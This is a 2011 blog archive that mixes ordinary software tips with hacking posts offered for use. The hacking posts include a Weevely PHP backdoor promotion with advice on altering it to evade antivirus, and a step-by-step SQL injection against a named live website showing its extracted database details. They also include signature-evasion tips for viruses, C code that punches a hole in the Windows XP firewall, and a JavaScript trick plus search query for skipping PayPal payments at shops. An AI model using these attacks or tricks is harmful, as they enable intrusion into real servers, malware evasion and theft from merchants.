Tuesday, 14 June 2011

Free Online Tool to Convert PDF files to JPG Image

PDF files are good when you want to look up an article or even a chart. I have a few interesting pdf files with helpful and informative diagrams. Sometimes I want to covert these PDF files into an image format.
I found pdf2jpg a useful online tool which converts a PDF file into JPG image file.
pdf2jpg online tool thumb Free Online Tool to Convert PDF files to JPG Image

PDF2JPG Features

  • Just upload your PDF file and click convert to get image files.
  • Sometimes as JPG images can take some time if the PDF file is large. In this case there is the option of leaving a email alert which sends an email when the conversion is complete.
  • Unfortunately the only drawback was that it can only manage pdf files which upto the size of 10 MB. This usually should not be a problem in most cases but PDFs with images usually are quite large-sized files.
This is a great tool to manage PDF files along with some others that allow converting a URL to PDF and also convert PDF files to Doc, HTML and Txt format with free online tools.

Do drop in your comments.
Link: PDF2JPG

List of 5 Online Tools to Find Similar Images

Google’s new addition to its image search is “similar image search” through which you can find similar or duplicate images. This feature is particularly useful when you want to view the source image, for example you have found an edited/photoshopped image of Sachin Tendulkar then you might want to know the source of that image.
For example, take a look at the below two images, you can keep the first image as wallpaper (by tiling) but not the second one (looks ugly). So, this can help wallpaper junkies a lot!
sachin List of 5 Online Tools to Find Similar Images
Here are some of the best sites which can help you in identifying similar images:

#1. Google Similar Images

“Google Similar Images” was a Google lab experiment but now it’s integrated into Google images. You can see the text “similar” at the bottom of any image when you hover over it. When I checked similar images for the below picture, there were 8 images which were matching it.
Sachin 1 List of 5 Online Tools to Find Similar Images
Link: Google Images


#2. TinEye Reverse Image Search

This is a bit advanced and it’s the best when compared to rest of them. What amazed me is that, when I searched similar images for the same image (which I used in Google image search), it came up with 32 relevant results!
sachin 2 List of 5 Online Tools to Find Similar Images
So, the relevancy of TinEye is very high compared to Google Image search. It also provides cool extensions for IE, Chrome, Firefox and Safari browsers. You can make use of their bookmarklet too!

Microsoft Sending a Message with IE 10 Preview!


IE logo Microsoft Sending a Message with IE 10 Preview!IE 10 Microsoft has almost always tied up the development of Internet Explorer browser with Windows. Whenever a new version of Windows is shipped out, the IE browser’s version also gets an upgrade.
Windows XP came with IE6, Windows Vista had IE7 and Windows 7 had IE8 pre-installed. The reception to the browser versions also reflected how the OS was received. Just like people are not ready to upgrade from XP to Vista, IE6 users seemed to not bother upgrading to IE7 or even IE8.

Microsoft’s message with IE 10

With IE 9 being released, many felt it was the last chance for Microsoft to save IE browser. With the release being only a month ago, the preview build of IE 10 was a surprise. IE 9 was expected to be shipped as default with the next version (Windows 8?) of Windows.
With IE 10 Microsoft is telling the internet community that they will probably upgrade browser versions without waiting for newer OS to be introduced.

IE 10 Features

IE10 platform preview thumb Microsoft Sending a Message with IE 10 Preview!
  • It is really good at making most use of screen space like IE 9 does.
  • The graphics support along with CSS rendering is pretty good, as shown by a tests like Fish bowl and Paint Ball.
  • IE 9 has a good record when it comes to handling power efficiency. For Laptop users like me, that is a good incentive. I found IE 10 preview not being as light-weight but that might change when IE 10 goes into Beta from Preview version.

What Microsoft needs to do to give IE 10 a boost?

Firstly, IE 10 preview only works with Windows 7. I am not sure if that will happen with IE 10 browser going ahead but if it does, then it would be disappointing. Internet Explorer needs to offer support to Mac OS and Linux-based OS.
This will truly separate IE from Windows as a product and maybe then we might see IE browser building its own independent identity as a browser which does not only revolve around Windows.
I doubt that all this will happen considering how IE finds itself shooting in the foot, what are your view? Do drop in your comments.
Link: IE 10 Preview

Customize Gmail Layout With Your Personal Image in Background


Gmail logo updates Customize Gmail Layout With Your Personal Image in BackgroundGmail is ramping up some of its features. It started the last week with having keyboard shortcuts being made available easily. Now a new update allows customizing your Gmail background with your own personal image from either our computer or Picasa web albums. icon smile Customize Gmail Layout With Your Personal Image in Background This is quite like adding customized background images to Google search page.

How to add your own image on Gmail Layout

  • Sign-in to your Gmail account and look up settings. Settings can be looked up by clicking on the right hand corner icon that looks like a gear wheel.
  • Now in Mail Settings look up the Themes tab. You will see the option of many ready to use themes.
customize gmail background thumb Customize Gmail Layout With Your Personal Image in Background
  • At the end look up Create your own Theme, which will a window that lets your customize colours and fonts.
  • On the right hand corner of the window you can see a drop-down option which allows you to add the background image (see image below).
customize gmail background image thumb Customize Gmail Layout With Your Personal Image in Background
Select your personal photos and customize your Gmail layouts background.
This is a new and nice addition to Gmail, which will allow people to make their email a little more personal. Do try it out and drop in your views through your comments.

How To Combine Your Files Into Any Section [Video Tutorial]

Ok Dude i Posted Video Tutorial On How to Combine Your Files Into Any File Extentions.!


Downloads :


A Stealth Tiny PHP Backdoor! weevely

With Weevely you can create and manage PHP trojan designed to be hardly detectable. This software is a proof of concept of an unobtrusive PHP backdoor that simulate a complete telnet-like connection, hidden datas in HTTP referers and using a dynamic probe of system-like functions to bypass PHP security restrictions. Generate PHP code to trojanize a web server, and act like a telnet client to execute commands or inject addictional function on backdoored server. weevely is also included in blackbox linux.
Features of weevely:
  • Coded requests: Communication between backdoor server and client are done via normal HTTP requests, with a plausible fake HTTP_REFERER header field that contains coded commands to hide traffic from NIDS monitoring and HTTP log files review.
  • PHP security bypass: The program try to bypass PHP configurations that disable sensible functions that execute external programs, enabled with the option disable functions located in php.ini. Weevely tries different system function (system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()) to find out and use functions enabled on remote server.
  • Tiny server: The backdoor server code is small and easily hideable in other PHP files. The core is dinamically cripted, aim to bypass pattern matching controls.
  • Modularity: Is simple to increment backdoor server feature with modules, injecting PHP code through the backdoor to implement new functionality on remote server. Code and load new modules is really easy. Current additional modules are: check safe mode, read file, download file on remote server, search writable path .
Sure looks good to be installed when you have control of a server and want to control it remotely. It is open source, so can be modified in case it is detected by anti-viruses.
Download Weevely v0.3 (weevely-0.3.tar.gz) here.
Postgre:


Traditional relational database management systems (DBMSs) support a data model consisting of a collection of named relations, containing attributes of a specific type. In current commercial systems, possible types include floating point numbers, integers, character strings,
money, and dates.

Lets start to play with Postgre:

1st Step find the vulnerability:

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80'

ERROR: syntax error at or near "''"
its mean this website can be injected.remember errors can varies you wont get the same error every time.

2nd Step Columns count:


Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 order by 1--

get valid page

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 order by 2--

Error Executing Database Query.
ERROR: ORDER BY position 2 is not in select list
That Error shows that there is one column.

Lets try UNION SELECT query:

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=2 UNION SELECT 1--

Error Executing Database Query.
ERROR: UNION types character varying and integer cannot be matched

Seems like UNION SELECT query is not working !!!


Lets try Errorbased Postgre SQLi…

3rd Step:

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)--


ERROR: invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"

As we can see we got version of postgre DB server in the form of error.

Lets move on and find database name.

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 0) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: "scoutsqld"
Scoutsqld is 1st database name you can variey offset to get other databases names.

scoutsqld is first database we can get others by changing offset :)

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 1) as int)--

Error Executing Database Query.
ERROR: invalid input syntax for integer: "template0"
template0 is 2nd database so you can increase offset till you got error.

Lets find out the user:

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select user from pg_database limit 1 offset 0) as int)--


Error Executing Database Query.

ERROR: invalid input syntax for integer: "postgres"

postgres is the user :)

Lets find the tables :>
4th step:


Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select table_name from information_schema.tables  limit 1 offset 0) as int)--


Error Executing Database Query.

ERROR: invalid input syntax for integer: "pg_type"

pg_type is first table we can get others by changing offset :)

5th step:

Now we have to find the columns from our specific table !!!

e.g

our table is action

for that we have to use oracle char conversion.

Pg_type= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)

so our query is :

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select column_name from information_schema.columns where table_name= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)  limit 1 offset 0) as int)--

Error Executing Database Query.
ERROR: invalid input syntax for integer: " typname "
And further you can find the columns using offset..

Last step:
Now we have to extract data from our column .


Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select typname from pg_type limit 1 offset 0) as int)--

Error Executing Database Query.
ERROR: invalid input syntax for integer: "bool"

[Video tut]Sqli injection Details Tutorial [Noob Friendly]

Presents Sqli Injection Fully Detailed Video Tutorial In High Quality Fully Detailed [Noob Friendly]
By Mr.Mind fReak


Download
http://www.filesonic.com/file/1191283394

Thursday, 9 June 2011

[Video Tut] WEP Cracking


Presents WEP [Wireless Cracking] Video Tutorial In High Quality Full Detailed [Noob Friendly]
By Mr.Mind fReak


Download:


[Video Tutorial] Detailed Tutorial How To Hack Website With XSS

Presents XSS Video Tutorial In High Quality Full Detailed [Noob Friendly]
By Mr.Mind fReak


Download From Here:


File Sonic

How does Antivirus software works or detects virus

Hello friends, today i will explain you all how an anti-virus software works and detects virus. Most of you already know that what is anti-virus, but have you ever tried to understand how it works and why it requires updates regularly? How anti-virus searches for viruses and detects the virus in the file and eliminates it or heal it. Working of anti-virus involves two basic technologies namely:
1. Dictionary based continuous and fragmented string search
2. Suspicious activity detection (process manipulation)

antivirus working, how antivirus detects virus
How does anti-virus software works

So friends, lets start learning how an anti-virus works and detects virus and then eliminates and heals them.

Dictionary based continuous and fragmented string Search:

As the technique's name suggest, as dictionary signifies virus definitions database that is regularly updated as soon as new virus is being found (that is found by second technique). In dictionary based search technique, anti-virus software searches a string by comparing the file with strings existing in virus definition's or database.
 Now consider an hypothetical example for better understanding, suppose you have a file whose code is something like below:
ABCDEFGHIJKLMNOPQRSTUVWXYZ
Now when a virus infects a file what it does it manipulates the original file and adds some extra code or functionality to it so that the behavior of file  changes that means that defers from its normal functioning. So after virus infection file becomes something like this:
ABCDEFGHIJKLMNOPQRSTUVWXYZ012345
where 012345 is the string that virus has attached to the file after infection.
Now what does anti-virus database contains is that 012345 string . It matches the string in database with string in program or code and if it matches it identifies it as a virus.
Note: This all processing is done on binary format of codes and sometimes executable. 
Only if you manipulate the virus string that is 012345 and add some dead code between that something like below:
0a1a2a3a4a5a that means what we have done is added a between virus string but attached it in such a way that a does not affects the processing of string(virus). That means we have made new virus as this string is not there in the anti-virus database so it is not detected by anti-virus.
How can you add dead code, consider this string only 0a1a2a3a5a , read the character one by one and whenever character 'a' is found just skip the processing else concatenate the string and store that in new variable and use that variable in further processing of the code. This is how we makes any virus undetectable.
Note: But suspicious activity technique might detect this way as functionality of virus string is same.

That's the main reason why anti-virus needs updates regularly. Anti-virus companies daily adds new detected strings to their database so that the user can remain secure.

We can also bypass this using crypters too but as we are elite hackers and not script kiddies so i love to do this by manual editing rather than doing it by tools. Because if you do it using tools you will never come to know how its happening. And the day crypter becomes detectable your virus also becomes detectable. So friends i will recommend you that never depend on tools for hacking for two reasons:
1. You will never come to know the real scenario that what is happening in real time that means no knowledge. When the tool become detectable then you are noob again.
2. Most tools available are already infected with key-loggers and spy Trojans that inspect your system and send personal credentials to hackers who has created them.

Suspicious activity detection:


The most effective method to detect any malfunctioning in your system as it does not based of any search techniques rather it depends on the behavior of programs and files that how they act while they are executed or running. In this technique what happens is that anti-virus identifies the normal behavior of the file or program that what it should do when it is run without infection. Now if any file or program do any illegal processing like manipulating windows files integrity and protection then anti-virus identifies that file as virus and terminate that program and process related to it. That's the only reason why it detects patches and key-gens  as virus, as they try to manipulate the files by disassembling their integrity. 
The main drawback of this technique is that its quite annoying as sometimes it detects normal files as virus too but if you want to keep your PC safe then you need to do what your anti-virus suggests.
Also note one more thing, 99% patches and key-gens that you use to crack softwares are already infected with Trojans which are identity theft programs that steals your personal information and send them hackers. Some patches also contains back-doors that make your system open for attack similar to the way you have left your house main gate open for thieves in night....:P but its truth... 

So what is the lesson you have got from this article stop using pirated softwares and cracks to patch them otherwise you can be in great trouble. Solution for this is simple use trusted free wares as alternatives for paid tools rather than using their cracked versions...

How to Bypass Windows XP Firewall

How to Bypass Windows XP Firewall using C program.
Hello Friends, today i will share with you the technique using which we can bypass windows-xp service pack-2 firewall. Its a 100% working hack and its basically an exploit in windows XP.
This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.


Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.



Vulnerable Systems :-
* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.If an attacker adds a new key to the registry address of  
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
 the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.

Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List

Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Source Code :-

#include <*stdio.h*>
#include <*windows.h*>

#include <*ezsocket.h*>

#include <*conio.h*>

#include "Shlwapi.h"

int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];

HKEY hKey;
int i;

GetModuleFileName(NULL, filename, 1024);

strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");

RegOpenKeyEx(

HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);

RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;

struct sockaddr_in remote_addr;

fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Adnan Anjum\n");
fprintf(stdout, "Dedicated to hackguide4u \n");

sleep(3);

if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;

for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);

if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello Pakistan\r\n", strlen("Hello
Pakistan\r\n"), 0);
fprintf(stdout, "Sended: Hello
Pakistan\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

if (!strcmp(buffer, "quit"))
break;
}

ezsocket_exit();
return 0;
}

/* EoF */
Remove ** from the header files... easier to understand...Here we are just manipulating registry values using this program...

All Hacking Tutorials By Mr.Mindfreak

Presents Hacking Tutorial All in one Collection By Mr.Mindfreak

Mr.Mindfreak:"Hello My Fans Or My Hacking Page Followers i Upload My Hacking Tutorials in DVD Fully High Quality And Share Here So Download and Learn Hacking Easily "


Remember Me in Your Prays .!


Download From FileSonic:


Download From FileServe:

Folder link:

http://www.fileserve.com/list/qKUBhap

[Video Tut] Basics of Trojans

Presents Basics of Trojans Video Tutorial In High Quality Full Detailed [Noob Friendly]
By Mr.Mind fReak


Download


Linkhttp://www.filesonic.com/folder/6382471

Saturday, 4 June 2011

Free Paypal "buy now" [Exploit]

This is a Simple bit of JavaScript that can bypass payments, the site's need to be sites like these:




http://livewebbanners.com/learn.shtml
or
http://www.tallentagency.com/YouTubeClone/index.htm

How to use it:
Copy the code (Below)
Go to the page that you'r doing it on
Paste the link you copied into the URL and it should start.


Code:
javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);

Hope this really help's you and you save a bit off $ $


Another tip:

To find these site's Google - "this order button requires a javascript enabled browser"

Type that in the "quotes" into google.

BT4 Assuring Security by Penetration Testing

If you are working in the “information security” field, you must know the BackTrack distribution (otherwise you must be an alien coming from a far away planet!). If you search for the word “backtrack” on Amazon, you will find lot of references but only one book is fully dedicated to the Linux distribution: “BackTrack 4: Assuring Security by Penetration Testing“. I received a copy directly from the publisher and here is my review.


Just for those who are not familiar with BackTrack, it’s a Linux distribution made by security professionals for security professionals: It contains hundreds of tools to perform security assessments and penetration tests. Some of them are well-known like Metasploit, WebScarab or sqlmap and others are real gems (example: ua-tester which was added recently) and  increase the quality of the toolbox version after version.
Even if BackTrack 5 was released a few weeks ago, it does not reduce the book quality. There are so many tools that a single volume is not enough to cover all of them.The following chapters covered the classic penetration testing schema:
  • Target scoping
  • Information gathering
  • Target discovery
  • Enumerating target
  • Vulnerability mapping
  • Social engineering
  • Target exploitation
  • Privilege escalation
  • Maintaining access
  • Documentation and reporting
Each chapter reviews the most interesting tools (according to the authors) to achieve the chapter topic. Tools are briefly explained with examples. Straight to the point!
So, who’s need this book? The author’s goal is certainly not to give recipes on “how to hack a website“. The book must been see as a reference for those who already know the BackTrack distribution or who want to learn it. Don’t forget: this is just a toolbox, it does not prevent you to use your brain!
More information about the book here.

New Google Feature (Recommendations when you want them.)

Recommendations when you want them.

+1 interface
Learn more about the +1 button play
The +1 button is shorthand for "this is pretty cool" or "you should check this out."
Click +1 to publicly give something your stamp of approval. Your +1's can help friends, contacts, and others on the web find the best stuff when they search.
Currently available for English searches on Google.com.
See +1s

See +1's

Sometimes it’s easier to find exactly what you’re looking for when someone you know already found it. Get recommendations for the things that interest you, right when you want them, in your search results.
The next time you’re trying to remember that bed and breakfast your buddy was raving about, or find a great charity to support, a +1 could help you out. Just make sure you're signed in to your Google Account.
Show +1s

Show +1's

In order to +1 things, you first need a public Google profile. This helps people see who recommended that tasty recipe or great campsite. When you create a profile, it's visible to anyone and connections with your email address can easily find it.
Your +1’s are stored in a new tab on your Google profile. You can show your +1’s tab to the world, or keep it private and just use it to personally manage the ever-expanding record of things you love around the web.

Friday, 3 June 2011

Make Your Computer Login Screen Like FBI Tunnel

[Image: img20110327121913.jpg]



Step 1 : Download Logon Studio ,

Image

LogonStudio 1.7 | 7Mb

Information:

Longing for some change in your life? Why not start with that boring old Windows XP logon screen? With the freeware LogonStudio, choosing another screen is a matter of two clicks. Alternately, you can design your own with a built-in editor.
The first option is a lot easier. About 30 cool screens are available on the WinCustomize site, and the program can randomly select one on every boot. Editing is less straightforward. You build or modify logon screens by tweaking parameters on a lengthy list of elements. So you might, for instance, change the FirstColor parameter of the Centre Panel element to a new shade of blue. This allows you to customize everything from background to letterings to buttons, but beginners will find the process quite confusing. The sketchy online help isn't much assistance, either.


Download For Windows Vista(Works With WIndows 7 too)


Download For WindowsXp:


2, Download FBI Files From Here:


3, iF YOU WANT TO REMOVE SWITCH USER BUTTON THEN YOU CAN DO WITH THIS REGISTERY TWEAK.